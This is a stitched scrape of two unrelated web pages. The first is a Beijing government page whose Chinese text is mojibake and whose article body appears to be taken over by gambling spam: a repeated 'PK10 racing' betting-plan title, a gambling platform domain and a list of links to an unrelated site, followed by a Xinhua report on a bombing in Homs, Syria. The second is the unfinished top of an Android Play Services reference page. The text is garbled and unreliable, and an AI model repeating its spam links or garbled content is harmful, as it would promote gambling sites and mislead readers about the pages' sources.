<li><a href="http://zhengwu.beijing.gov.cn/" class="normal" title="ÕþÎñÐÅÏ¢">ÕþÎñÐÅÏ¢</a></li>
<li><a href="http://www.beijing.gov.cn/sqmy/default.htm" class="normal" title="ÉçÇéÃñÒâ">ÉçÇéÃñÒâ</a></li>
<li><a href="http://banshi.beijing.gov.cn" class="normal" title="ÕþÎñ·þÎñ">ÕþÎñ·þÎñ</a></li>
<li><a href="http://www.beijing.gov.cn/bmfw" class="normal" title="±ãÃñ·þÎñ">±ãÃñ·þÎñ</a></li>
<li style="background:none;"><a href="http://www.beijing.gov.cn/rwbj/default.htm" class="normal" title="ÈËÎı±¾©">ÈËÎı±¾©</a></li>
</ul>
</div>
</div><!--/.nav-collapse -->
</div>
</div>
</div>
<div class="container" style="background:#fff; margin-top:24px;">
<div class="content_text">
<div id="breadcrumbnav">
<ul>
<li>Ê×Ò³¡¡>¡¡±ãÃñ·þÎñ¡¡>¡¡×îÐÂÌáʾ</li>
</ul>
<div class="clearboth"></div>
</div>
<h1>±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»®
<div id="othermessage">
<p>
<span>À´Ô´£º±±¾©ÈÕ±¨</span>
<span>ÈÕÆÚ£º2017-04-21 08:35:47</span></p>
<dl>
<scRiPt language='JavaScript' type="text/javascRiPt">
function changeSize(size){document.getElementById('div_zhengwen').style.fontSize=size+'px'}</scRiPt>
¡¾×ֺŠ<a href='javascRiPt:changeSize(18)' style="font-size:16px;">´ó</a> <a href='javascRiPt:changeSize(14)' style="font-size:14px;">ÖÐ</a> <a href='javascRiPt:changeSize(12)' style="font-size:12px;">С</a>¡¿</dl>
</div>
</h1>
<div id="div_zhengwen">
<div id="pic">
<ul id="pic_0">
<li><img src="" border="0" alt="" title="" /></li>
<li></li>
</ul>
<ul id="pic_1">
<li><img src="" border="0" alt="" title="" /></li>
<li></li>
</ul>
<ul id="pic_2">
<li><img src="" border="0" alt="" title="" /></li>
<li></li>
</ul>
<ul id="pic_3">
<li><img src="" border="0" alt="" title="" /></li>
<li></li>
</ul>
<ul id="pic_4">
<li><img src="" border="0" alt="" title="" /></li>
<li></li>
</ul>
<ul id="pic_5">
<li><img src="" border="0" alt="" title="" /></li>
<li></li>
</ul>
<ul id="pic_6">
<li><img src="" border="0" alt="" title="" /></li>
<li></li>
</ul>
<ul id="pic_7">
<li><img src="" border="0" alt="" title="" /></li>
<li></li>
</ul>
<ul id="pic_8">
<li><img src="" border="0" alt="" title="" /></li>
<li></li>
</ul>
<ul id="pic_9">
<li><img src="" border="0" alt="" title="" /></li>
<li></li>
</ul>
</div>
<div class=TRS_Editor><p align="justify">¡¡¡¡±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»® »¶Ó´ó¼ÒÀ´µ½dld158.comÓéÀÖÆ½Ì¨</p>
<img src="{img}" width="300" height="330"/>
<p align="justify">¡¡¡¡<a href="http://sapience.com.tw/logs/meng/q0302734.html">±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»®</a></p>±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»®
<p align="justify">¡¡¡¡<a href="http://sapience.com.tw/logs/meng/q629356.html">±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»®</a></p>±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»®
<p align="justify">¡¡¡¡<a href="http://sapience.com.tw/logs/meng/q0281323.html">±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»®</a></p>±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»®
<p align="justify">¡¡¡¡<a href="http://sapience.com.tw/logs/meng/q2321059.html">±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»®</a></p>±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»®
<p align="justify">¡¡¡¡<a href="http://sapience.com.tw/logs/meng/q338708.html">±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»®</a></p>±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»®
<p align="justify">¡¡¡¡<p>¡¡¡¡Ð»ªÉç´óÂíÊ¿¸ï3ÔÂ29Èյ磨¼ÇÕß³µºêÁÁ£©ÐðÀûÑÇÖв¿³ÇÊлôķ˹һÁ¾Ð¡ÐͿͳµ29ÈÕÔâÕ¨µ¯Ï®»÷£¬Ôì³ÉÖÁÉÙ5ÈËËÀÍö£¬ÁíÓÐ6ÈËÊÜÉË¡£<br /><br />¡¡¡¡¾ÝÐðͨÉ籨µÀ£¬¿Í³µÔâÏ®µØµãλÓÚ»ôķ˹ÊÐÔú¹þÀÇø¡£Ä¿Ç°ÉÐÎÞ×éÖ¯Ðû³ÆÖÆÔì´Ë´ÎÏ®»÷¡£<br /><br />¡¡¡¡Ôú¹þÀÇøÊÇÐð×Üͳ°Íɳ¶û¡¤°¢ÈøµÂËùÊô°¢ÀάÅÉÄÂ˹ÁÖ¾Û¾ÓÇø£¬¾ÓÃñ¶àΪÕþ¸®Ö§³ÖÕߣ¬µ±µØÒѶà´Î·¢ÉúÏ®»÷ʼþ¡£<br /><br />¡¡¡¡½ñÄê2Ôµ×ÒÔÀ´£¬»ôķ˹¡¢´óÂíÊ¿¸ïµÈµØ±©Á¦Ï®»÷Ƶ·¢£¬ÉËÍöÇé¿öÑÏÖØ¡£±¾ÔÂ23ÈÕ£¬»ôķ˹һ×ù¾üʼì²éÕ¾Ôâ×ÔɱʽÆû³µÕ¨µ¯Ï®»÷£¬Ôì³É3ÃûÊ¿±øËÀÍö¡£ÉÏÔÂ25ÈÕ£¬»ôķ˹ÔâÁ¬»·±¬Õ¨Ï®»÷£¬Ôì³ÉÊýÊ®ÈËËÀÍö¡£<br /><br />¡¡¡¡×÷Õߣº³µºêÁÁ (À´Ô´£ºÐ»ªÉç)</p><SCRIPT>media_span_url('http://news.xinhuanet.com/world/2017-03/30/c_1120720568.htm')</SCRIPT</p></div>
<div id="filerider">
<div class="filelink" style="margin:10px 0 0 0;"><a href="./P020160207382291268334.doc">¸½¼þ£º2016Äê±±¾©µØÇø²©Îï¹Ý´º½ÚϵÁлһÀÀ±í</a></div>
</div>
</div>
<div id="essaybottom" style="border:0; overflow:hidden; margin-bottom:0;">
<div style="padding-bottom:8px;" id="proclaim"><p style="float:left; line-height:30px;">·ÖÏíµ½£º</p><div class="bdsharebuttonbox"><a href="#" class="bds_more" data-cmd="more"></a><a href="#" class="bds_qzone" data-cmd="qzone"></a><a href="#" class="bds_tsina" data-cmd="tsina"></a><a href="#" class="bds_tqq" data-cmd="tqq"></a><a href="#" class="bds_renren" data-cmd="renren"></a><a href="#" class="bds_weixin" data-cmd="weixin"></a></div>
<scRiPt>window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdPic":"","bdStyle":"0","bdSize":"16"},"share":{},"image":{"viewList":["qzone","tsina","tqq","renren","weixin"],"viewText":"·ÖÏíµ½£º","viewSize":"16"},"selectShare":{"bdContainerClass":null,"bdSelectMiniList":["qzone","tsina","tqq","renren","weixin"]}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('scRiPt')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];</scRiPt></div>
</div>
<div id="essaybottom" style="margin-top:0;">
<div style="padding-bottom:8px;" id="proclaim">תժÉùÃ÷£º×ªÕªÇë×¢Ã÷³ö´¦²¢×ö»ØÁ´</div>
</div>
</div>
</div>
<!-- /container -->
<div id="footer">
<div class="container">
<div class="span1" style="text-align:center"><scRiPt type="text/javascRiPt">document.write(unescape("%3Cspan id='_ideConac' %3E%3C/span%3E%3CscRiPt src='http://dcs.conac.cn/js/01/000/0000/60429971/CA010000000604299710004.js' type='text/javascRiPt'%3E%3C/scRiPt%3E"));</scRiPt></div>
<div class="span8">
<div class="footer-top">
<div class="footer-class">
<p> <a title="¹ØÓÚÎÒÃÇ" href="http://www.beijing.gov.cn/zdxx/sdzcjs/t1306339.htm" style=" background:0">¹ØÓÚÎÒÃÇ</a><a target="_blank" title="Õ¾µãµØÍ¼" href="http://www.beijing.gov.cn/zdxx/sdzcjs/t1306342.htm">Õ¾µãµØÍ¼</a><a target="_blank" title="ÁªÏµÎÒÃÇ" href="http://www.beijing.gov.cn/zdxx/sdzcjs/t1306343.htm">ÁªÏµÎÒÃÇ</a><a target="_blank" title="ÆÀ¼ÛÊ×¶¼Ö®´°" href="mailto:service@beijing.gov.cn">ÆÀ¼ÛÊ×¶¼Ö®´°</a><a target="_blank" title="·¨ÂÉÉùÃ÷" href="http://www.beijing.gov.cn/zdxx/t709204.htm">·¨ÂÉÉùÃ÷</a> </p>
<p>Ö÷°ì£º±±¾©ÊÐÈËÃñÕþ¸® °æÈ¨ËùÓга죺±±¾©Êо¼ÃºÍÐÅÏ¢»¯Î¯Ô±»á ¾©ICP±¸05060933ºÅ ÔËÐйÜÀí£ºÊ×¶¼Ö®´°ÔËÐйÜÀíÖÐÐÄ</p>
<p>¾©¹«Íø°²±¸ 110105000722 µØÖ·£º±±¾©Êг¯ÑôÇø±±³½Î÷·Êý×Ö±±¾©´óÏÃÄϰ˲㠴«Õ棺84371700 ¿Í·þÖÐÐĵ绰£º59321109</p>
</div>
</div>
</div>
</div>
</div>
<div style="display:none">
<scRiPt type="text/javascRiPt">document.write(unescape("%3CscRiPt src='http://yhfx.beijing.gov.cn/webdig.js?z=12' type='text/javascRiPt'%3E%3C/scRiPt%3E"));</scRiPt>
<scRiPt type="text/javascRiPt">wd_paramtracker("_wdxid=000000000000000000000000000000000000000000")</scRiPt>
</div>
<scRiPt src="http://static.gridsumdissector.com/js/Clients/GWD-800003-C99186/gs.js" language="JavaScript"></scRiPt>
<scRiPt type="text/javascRiPt">
// ÉèÖÃΪÖ÷Ò³
function SetHome(obj,vrl){
try{
obj.style.behavior='url(#default#homepage)';obj.setHomePage(vrl);
}
catch(e){
if(window.netscape) {
try {
netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");
}
catch (e) {
alert("´Ë²Ù×÷±»ä¯ÀÀÆ÷¾Ü¾ø£¡\nÇëÔÚä¯ÀÀÆ÷µØÖ·À¸ÊäÈë¡°about:config¡±²¢»Ø³µ\nÈ»ºó½« [signed.applets.codebase_principal_support]µÄÖµÉèÖÃΪ'true',Ë«»÷¼´¿É¡£");
}
var prefs = Components.classes['@mozilla.org/preferences-service;1'].getService(Components.interfaces.nsIPrefBranch);
prefs.setCharPref('browser.startup.homepage',vrl);
}else{
alert("ÄúµÄä¯ÀÀÆ÷²»Ö§³Ö£¬Çë°´ÕÕÏÂÃæ²½Öè²Ù×÷£º1.´ò¿ªä¯ÀÀÆ÷ÉèÖá£2.µã»÷ÉèÖÃÍøÒ³¡£3.ÊäÈ룺"+vrl+"µã»÷È·¶¨¡£");
}
}
}
// ¼ÓÈëÊÕ²Ø ¼æÈÝ360ºÍIE6
function shoucang(sTitle,sURL)
{
try
{
window.external.addFavorite(sURL, sTitle);
}
catch (e)
{
try
{
window.sidebar.addPanel(sTitle, sURL, "");
}
catch (e)
{
alert("¼ÓÈëÊÕ²ØÊ§°Ü£¬ÇëʹÓÃCtrl+D½øÐÐÌí¼Ó");
}
}
}
</scRiPt>
<!-- Le javascRiPt
================================================== -->
<!-- Placed at the end of the document so the pages load faster -->
<scRiPt src="/images/zhuanti/xysym/jquery.js"></scRiPt>
<scRiPt src="/images/zhuanti/xysym/bootstrap-collapse.js"></scRiPt>
<scRiPt>
$(document).ready(function(){
$(".ui-select").selectWidget({
change : function (changes) {
return changes;
},
effect : "slide",
keyControl : true,
speed : 200,
scrollHeight : 250
});
});
</scRiPt>
</body>
</html>
|
BeerDrop-android/libs/google_play_services/docs/reference/com/google/android/gms/games/multiplayer/Invitations.LoadInvitationsResult.html
|
DarkoDanchev/BeerDrop-Game-
|
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="viewport" content="width=device-width" />
<link rel="shortcut icon" type="image/x-icon" href="../../../../../../../favicon.ico" />
<title>Invitations.LoadInvitationsResult | Android Developers</title>
<!-- STYLESHEETS -->
<link rel="stylesheet"
href="http://fonts.googleapis.com/css?family=Roboto+Condensed">
<link rel="stylesheet" href="http://fonts.googleapis.com/css?family=Roboto:light,regular,medium,thin,italic,mediumitalic,bold"
title="roboto">
<link href="../../../../../../../assets/css/default.css?v=2" rel="stylesheet" type="text/css">
<!-- FULLSCREEN STYLESHEET -->
<link href="../../../../../../../assets/css/fullscreen.css" rel="stylesheet" class="fullscreen"
type="text/css">
<!-- JAVASCRIPT -->
<script src="http://www.google.com/jsapi" type="text/javascript"></script>
<script src="../../../../../../../assets/js/android_3p-bundle.js" type="text/javascript"></script>
<script type="text/javascript">
var toRoot = "../../../../../../../";
var metaTags = [];
var devsite = false;
</script>
<script src="../../../../../../../assets/js/docs.js?v=2" type="text/javascript"></script>
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-5831155-1', 'android.com');
ga('create', 'UA-49880327-2', 'android.com', {'name': 'universal'}); // New tracker);
ga('send', 'pageview');
ga('universal.send', 'pageview'); // Send page view for new tracker.
</script>
</head>
<body class="gc-documentation
develop" itemscope itemtype="http://schema.org/Article">
<div id="doc-api-level" class="" style="display:none"></div>
<a name="top"></a>
<a name="top"></a>
<!-- Header -->
<div id="header-wrapper">
<div id="header">
<div class="wrap" id="header-wrap">
<div class="col-3 logo">
<a href="../../../../../../../index.html">
<img src="../../../../../../../assets/images/dac_logo.png"
srcset="../../../../../../../assets/images/dac_logo@2x.png 2x"
width="123" height="25" alt="Android Developers" />
</a>
<div class="btn-quicknav" id="btn-quicknav">
<a href="#" class="arrow-inactive">Quicknav</a>
<a href="#" class="arrow-active">Quicknav</a>
</div>
</div>
<ul class="nav-x col-9">
<li class="design">
<a href="../../../../../../../design/index.html"
zh-tw-lang="設計"
zh-cn-lang="设计"
ru-lang="Проектирование"
ko-lang="디자인"
ja-lang="設計"
es-lang="Diseñar"
>Design</a></li>
<li class="develop"><a href="../../../../../../../develop/index.html"
zh-tw-lang="開發"
zh-cn-lang="开发"
ru-lang="Разработка"
ko-lang="개발"
ja-lang="開発"
es-lang="Desarrollar"
>Develop</a></li>
<li class="distribute last"><a href="../../../../../../../distribute/googleplay/index.html"
zh-tw-lang="發佈"
zh-cn-lang="分发"
ru-lang="Распространение"
ko-lang="배포"
ja-lang="配布"
es-lang="Distribuir"
>Distribute</a></li>
</ul>
<div class="menu-container">
<div class="moremenu">
<div id="more-btn"></div>
</div>
<div class="morehover" id="moremenu">
<div class="top"></div>
<div class="mid">
<div class="header">Links</div>
<ul>
<li><a href="https://play.google.com/apps/publish/" target="_googleplay">Google Play Developer Console</a></li>
<li><a href="http://android-developers.blogspot.com/">Android Developers Blog</a></li>
<li><a href="../../../../../../../about/index.html">About Android</a></li>
</ul>
<div class="header">Android Sites</div>
<ul>
<li><a href="http://www.android.com">Android.com</a></li>
<li class="active"><a>Android Developers</a></li>
<li><a href="http://source.android.com">Android Open Source Project</a></li>
</ul>
<br class="clearfix" />
</div><!-- end 'mid' -->
<div class="bottom"></div>
</div><!-- end 'moremenu' -->
<div class="search" id="search-container">
<div class="search-inner">
<div id="search-btn"></div>
<div class="left"></div>
<form onsubmit="return submit_search()">
<input id="search_autocomplete" type="text" value="" autocomplete="off" name="q"
onfocus="search_focus_changed(this, true)" onblur="search_focus_changed(this, false)"
onkeydown="return search_changed(event, true, '../../../../../../../')"
onkeyup="return search_changed(event, false, '../../../../../../../')" />
</form>
<div class="right"></div>
<a class="close hide">close</a>
<div class="left"></div>
<div class="right"></div>
</div><!-- end search-inner -->
</div><!-- end search-container -->
<div class="search_filtered_wrapper reference">
<div class="suggest-card reference no-display">
<ul class="search_filtered">
</ul>
</div>
</div>
<div class="search_filtered_wrapper docs">
<div class="suggest-card dummy no-display"> </div>
<div class="suggest-card develop no-display">
<ul class="search_filtered">
</ul>
<div class="child-card guides no-display">
</div>
<div class="child-card training no-display">
</div>
<div class="child-card samples no-display">
</div>
</div>
<div class="suggest-card design no-display">
<ul class="search_filtered">
</ul>
</div>
<div class="suggest-card distribute no-display">
<ul class="search_filtered">
</ul>
</div>
</div>
</div><!-- end menu-container (search and menu widget) -->
<!-- Expanded quicknav -->
<div id="quicknav" class="col-13">
<ul>
<li class="about">
<ul>
<li><a href="../../../../../../../about/index.html">About</a></li>
<li><a href="../../../../../../../wear/index.html">Wear</a></li>
<li><a href="../../../../../../../tv/index.html">TV</a></li>
<li><a href="../../../../../../../auto/index.html">Auto</a></li>
</ul>
</li>
<li class="design">
<ul>
<li><a href="../../../../../../../design/index.html">Get Started</a></li>
<li><a href="../../../../../../../design/devices.html">Devices</a></li>
<li><a href="../../../../../../../design/style/index.html">Style</a></li>
<li><a href="../../../../../../../design/patterns/index.html">Patterns</a></li>
<li><a href="../../../../../../../design/building-blocks/index.html">Building Blocks</a></li>
<li><a href="../../../../../../../design/downloads/index.html">Downloads</a></li>
<li><a href="../../../../../../../design/videos/index.html">Videos</a></li>
</ul>
</li>
<li class="develop">
<ul>
<li><a href="../../../../../../../training/index.html"
zh-tw-lang="訓練課程"
zh-cn-lang="培训"
ru-lang="Курсы"
ko-lang="교육"
ja-lang="トレーニング"
es-lang="Capacitación"
>Training</a></li>
<li><a href="../../../../../../../guide/index.html"
zh-tw-lang="API 指南"
zh-cn-lang="API 指南"
ru-lang="Руководства по API"
ko-lang="API 가이드"
ja-lang="API ガイド"
es-lang="Guías de la API"
>API Guides</a></li>
<li><a href="../../../../../../../reference/packages.html"
zh-tw-lang="參考資源"
zh-cn-lang="参考"
ru-lang="Справочник"
ko-lang="참조문서"
ja-lang="リファレンス"
es-lang="Referencia"
>Reference</a></li>
<li><a href="../../../../../../../sdk/index.html"
zh-tw-lang="相關工具"
zh-cn-lang="工具"
ru-lang="Инструменты"
ko-lang="도구"
ja-lang="ツール"
es-lang="Herramientas"
>Tools</a>
</li>
<li><a href="../../../../../../../google/index.html">Google Services</a>
</li>
</ul>
</li>
<li class="distribute last">
<ul>
<li><a href="../../../../../../../distribute/googleplay/index.html">Google Play</a></li>
<li><a href="../../../../../../../distribute/essentials/index.html">Essentials</a></li>
<li><a href="../../../../../../../distribute/users/index.html">Get Users</a></li>
<li><a href="../../../../../../../distribute/engage/index.html">Engage & Retain</a></li>
<li><a href="../../../../../../../distribute/monetize/index.html">Monetize</a></li>
<li><a href="../../../../../../../distribute/tools/index.html">Tools & Reference</a></li>
<li><a href="../../../../../../../distribute/stories/index.html">Developer Stories</a></li>
</ul>
</li>
</ul>
</div><!-- /Expanded quicknav -->
</div><!-- end header-wrap.wrap -->
</div><!-- end header -->
<!-- Secondary x-nav -->
<div id="nav-x">
<div class="wrap">
<ul class="nav-x col-9 develop" style="width:100%">
<li class="training"><a href="../../../../../../../training/index.html"
zh-tw-lang="訓練課程"
zh-cn-lang="培训"
ru-lang="Курсы"
ko-lang="교육"
ja-lang="トレーニング"
es-lang="Capacitación"
>Training</a></li>
<li class="guide"><a href="../../../../../../../guide/index.html"
zh-tw-lang="API 指南"
zh-cn-lang="API 指南"
ru-lang="Руководства по API"
ko-lang="API 가이드"
ja-lang="API ガイド"
es-lang="Guías de la API"
>API Guides</a></li>
<li class="reference"><a href="../../../../../../../reference/packages.html"
zh-tw-lang="參考資源"
zh-cn-lang="参考"
ru-lang="Справочник"
ko-lang="참조문서"
ja-lang="リファレンス"
es-lang="Referencia"
>Reference</a></li>
<li class="tools"><a href="../../../../../../../sdk/index.html"
zh-tw-lang="相關工具"
zh-cn-lang="工具"
ru-lang="Инструменты"
ko-lang="도구"
ja-lang="ツール"
es-lang="Herramientas"
>Tools</a></li>
<li class="google"><a href="../../../../../../../google/index.html"
>Google Services</a>
</li>
</ul>
</div>
</div>
<!-- /Sendondary x-nav DEVELOP -->
<div id="searchResults" class="wrap" style="display:none;">
<h2 id="searchTitle">Results</h2>
<div id="leftSearchControl" class="search-control">Loading...</div>
</div>
</div> <!--end header-wrapper -->
<div id="sticky-header">
<div>
<a class="logo" href="#top"></a>
<a class="top" href="#top"></a>
<ul class="breadcrumb">
<li class="current">Invitations.LoadInvitationsResult</li>
</ul>
</div>
</div>
<div class="wrap clearfix" id="body-content">
<div class="col-4" id="side-nav" itemscope itemtype="http://schema.org/SiteNavigationElement">
<div id="devdoc-nav">
<div id="api-nav-header">
<div id="api-level-toggle">
<label for="apiLevelCheckbox" class="disabled"
title="Select your target API level to dim unavailable APIs">API level: </label>
<div class="select-wrapper">
<select id="apiLevelSelector">
<!-- option elements added by buildApiLevelSelector() -->
</select>
</div>
</div><!-- end toggle -->
<div id="api-nav-title">Android APIs</div>
</div><!-- end nav header -->
<script>
var SINCE_DATA = [ ];
buildApiLevelSelector();
</script>
<div id="swapper">
<div id="nav-panels">
<div id="resize-packages-nav">
<div id="packages-nav" class="scroll-pane">
<ul>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/package-summary.html">com.google.android.gms</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/actions/package-summary.html">com.google.android.gms.actions</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/ads/package-summary.html">com.google.android.gms.ads</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/ads/doubleclick/package-summary.html">com.google.android.gms.ads.doubleclick</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/ads/identifier/package-summary.html">com.google.android.gms.ads.identifier</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/ads/mediation/package-summary.html">com.google.android.gms.ads.mediation</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/ads/mediation/admob/package-summary.html">com.google.android.gms.ads.mediation.admob</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/ads/mediation/customevent/package-summary.html">com.google.android.gms.ads.mediation.customevent</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/ads/purchase/package-summary.html">com.google.android.gms.ads.purchase</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/ads/search/package-summary.html">com.google.android.gms.ads.search</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/analytics/package-summary.html">com.google.android.gms.analytics</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/analytics/ecommerce/package-summary.html">com.google.android.gms.analytics.ecommerce</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/appindexing/package-summary.html">com.google.android.gms.appindexing</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/appstate/package-summary.html">com.google.android.gms.appstate</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/auth/package-summary.html">com.google.android.gms.auth</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/auth/api/package-summary.html">com.google.android.gms.auth.api</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/cast/package-summary.html">com.google.android.gms.cast</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/common/package-summary.html">com.google.android.gms.common</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/common/annotation/package-summary.html">com.google.android.gms.common.annotation</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/common/api/package-summary.html">com.google.android.gms.common.api</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/common/data/package-summary.html">com.google.android.gms.common.data</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/common/images/package-summary.html">com.google.android.gms.common.images</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/drive/package-summary.html">com.google.android.gms.drive</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/drive/events/package-summary.html">com.google.android.gms.drive.events</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/drive/metadata/package-summary.html">com.google.android.gms.drive.metadata</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/drive/query/package-summary.html">com.google.android.gms.drive.query</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/drive/widget/package-summary.html">com.google.android.gms.drive.widget</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/fitness/package-summary.html">com.google.android.gms.fitness</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/fitness/data/package-summary.html">com.google.android.gms.fitness.data</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/fitness/request/package-summary.html">com.google.android.gms.fitness.request</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/fitness/result/package-summary.html">com.google.android.gms.fitness.result</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/fitness/service/package-summary.html">com.google.android.gms.fitness.service</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/games/package-summary.html">com.google.android.gms.games</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/games/achievement/package-summary.html">com.google.android.gms.games.achievement</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/games/event/package-summary.html">com.google.android.gms.games.event</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/games/leaderboard/package-summary.html">com.google.android.gms.games.leaderboard</a></li>
<li class="selected api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/games/multiplayer/package-summary.html">com.google.android.gms.games.multiplayer</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/games/multiplayer/realtime/package-summary.html">com.google.android.gms.games.multiplayer.realtime</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/games/multiplayer/turnbased/package-summary.html">com.google.android.gms.games.multiplayer.turnbased</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/games/quest/package-summary.html">com.google.android.gms.games.quest</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/games/request/package-summary.html">com.google.android.gms.games.request</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/games/snapshot/package-summary.html">com.google.android.gms.games.snapshot</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/gcm/package-summary.html">com.google.android.gms.gcm</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/identity/intents/package-summary.html">com.google.android.gms.identity.intents</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/identity/intents/model/package-summary.html">com.google.android.gms.identity.intents.model</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/location/package-summary.html">com.google.android.gms.location</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/maps/package-summary.html">com.google.android.gms.maps</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/maps/model/package-summary.html">com.google.android.gms.maps.model</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/panorama/package-summary.html">com.google.android.gms.panorama</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/plus/package-summary.html">com.google.android.gms.plus</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/plus/model/moments/package-summary.html">com.google.android.gms.plus.model.moments</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/plus/model/people/package-summary.html">com.google.android.gms.plus.model.people</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/security/package-summary.html">com.google.android.gms.security</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/tagmanager/package-summary.html">com.google.android.gms.tagmanager</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/wallet/package-summary.html">com.google.android.gms.wallet</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/wallet/fragment/package-summary.html">com.google.android.gms.wallet.fragment</a></li>
<li class="api apilevel-">
<a href="../../../../../../../reference/com/google/android/gms/wearable/package-summary.html">com.google.android.gms.wearable</a></li>
</ul><br/>
</div> <!-- end packages-nav -->
</div> <!-- end resize-packages -->
<div id="classes-nav" class="scroll-pane">
<ul>
<li><h2>Interfaces</h2>
<ul>
<li class="api apilevel-"><a href="../../../../../../../reference/com/google/android/gms/games/multiplayer/Invitation.html">Invitation</a></li>
<li class="api apilevel-"><a href="../../../../../../../reference/com/google/android/gms/games/multiplayer/Invitations.html">Invitations</a></li>
<li class="selected api apilevel-"><a href="../../../../../../../reference/com/google/android/gms/games/multiplayer/Invitations.LoadInvitationsResult.html">Invitations.LoadInvitationsResult</a></li>
<li class="api apilevel-"><a href="../../../../../../../reference/com/google/android/gms/games/multiplayer/Multiplayer.html">Multiplayer</a></li>
